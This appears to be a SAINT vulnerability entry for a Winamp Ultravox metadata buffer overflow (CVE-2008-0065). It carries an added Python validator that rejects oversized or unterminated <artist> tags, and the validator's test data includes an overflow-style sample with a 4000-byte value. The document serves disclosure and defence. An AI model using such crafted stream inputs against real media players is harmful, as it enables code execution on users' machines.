ID SAINT:851664FB8EBE47E57F665799E4455AC8
Type saint
Reporter SAINT Corporation
Modified 2008-02-04T00:00:00
Description
Added: 02/04/2008
CVE: CVE-2008-0065
BID: 27344
OSVDB: 41707
Background
Winamp is a media player for Windows.
Problem
A buffer overflow vulnerability in the **in_mp3.dll** library when parsing Ultravox streaming metadata allows command execution when a user opens a stream containing a long, specially crafted **<artist>** tag value.
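As an added example (not code from SAINT, Winamp or the Secunia advisory), the Python validator below shows the bounds check a metadata parser needs for this class of bug: it measures each tag value in place and rejects the stream when the `<artist>` value is oversized or unterminated, before anything is copied into a fixed-size buffer or handed to the player. The 256-byte limit, the default tag list and the sample metadata blocks are assumptions made for this example, not figures from the advisory.

```python
"""Bounded-length validation of Ultravox stream metadata tags.

Added example for the advisory above; not code from SAINT, Winamp or any
stream-server project. The parser measures tag values without copying them,
so an oversized value is rejected instead of overflowing a fixed buffer.
"""
from dataclasses import dataclass
from typing import Dict, Tuple

# Editorial policy limit (assumption, not a value from the advisory):
# legitimate artist names and track titles are far shorter than this.
DEFAULT_MAX_TAG_LEN = 256

# Constructed sample inputs (not captured traffic), in the shape the advisory
# describes: an Ultravox <metadata> document carrying <song><artist>...</artist>.
BENIGN_METADATA = (
    b"<metadata><song><name>Song Title</name>"
    b"<artist>Some Band</artist></song></metadata>"
)
# Artist value far longer than any real name: must be rejected.
OVERSIZED_METADATA = (
    b"<metadata><song><artist>" + b"A" * 4000 + b"</artist></song></metadata>"
)
# Opening tag with no closing tag: also rejected, never scanned to the end.
UNTERMINATED_METADATA = b"<metadata><song><artist>" + b"B" * 300


@dataclass
class TagCheck:
    present: bool      # opening tag found in the document
    length: int        # bytes between the opening and closing tag
    terminated: bool   # closing tag found after the opening tag
    over_limit: bool   # value longer than max_len, or unterminated


def check_tag(metadata: bytes, tag: str, max_len: int) -> TagCheck:
    """Locate <tag>...</tag> and measure the value without slicing it out."""
    open_marker = b"<" + tag.encode("ascii") + b">"
    close_marker = b"</" + tag.encode("ascii") + b">"
    start = metadata.find(open_marker)
    if start < 0:
        return TagCheck(present=False, length=0, terminated=False, over_limit=False)
    value_start = start + len(open_marker)
    end = metadata.find(close_marker, value_start)
    if end < 0:
        # Unterminated value: treat as over the limit regardless of length,
        # since a parser that keeps reading until '</artist>' would run on.
        return TagCheck(present=True, length=len(metadata) - value_start,
                        terminated=False, over_limit=True)
    length = end - value_start
    return TagCheck(present=True, length=length, terminated=True,
                    over_limit=length > max_len)


def validate_metadata(metadata: bytes,
                      tags: Tuple[str, ...] = ("artist",),
                      max_len: int = DEFAULT_MAX_TAG_LEN) -> Dict[str, TagCheck]:
    """Run check_tag for every tag the policy cares about."""
    return {tag: check_tag(metadata, tag, max_len) for tag in tags}


def is_safe(metadata: bytes,
            tags: Tuple[str, ...] = ("artist",),
            max_len: int = DEFAULT_MAX_TAG_LEN) -> bool:
    """True only when every checked tag is absent, or terminated and within limit."""
    return all(not check.over_limit
               for check in validate_metadata(metadata, tags, max_len).values())


if __name__ == "__main__":
    samples = (("benign", BENIGN_METADATA),
               ("oversized", OVERSIZED_METADATA),
               ("unterminated", UNTERMINATED_METADATA))
    for label, sample in samples:
        verdict = "accept" if is_safe(sample) else "reject"
        print(f"{label:12s} {verdict}  {validate_metadata(sample)}")
```

Passing `tags=("artist", "name")` applies the same limit to the `<name>` tag as well, which is how the check generalises to any other tag a parser copies into a fixed buffer.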
Resolution
Upgrade to Winamp 5.52 or higher.
References
<http://secunia.com/secunia_research/2008-2/advisory/>
Limitations
Exploit works on Winamp 5.21 and requires a user to open the exploit stream in Winamp.
Platforms
Windows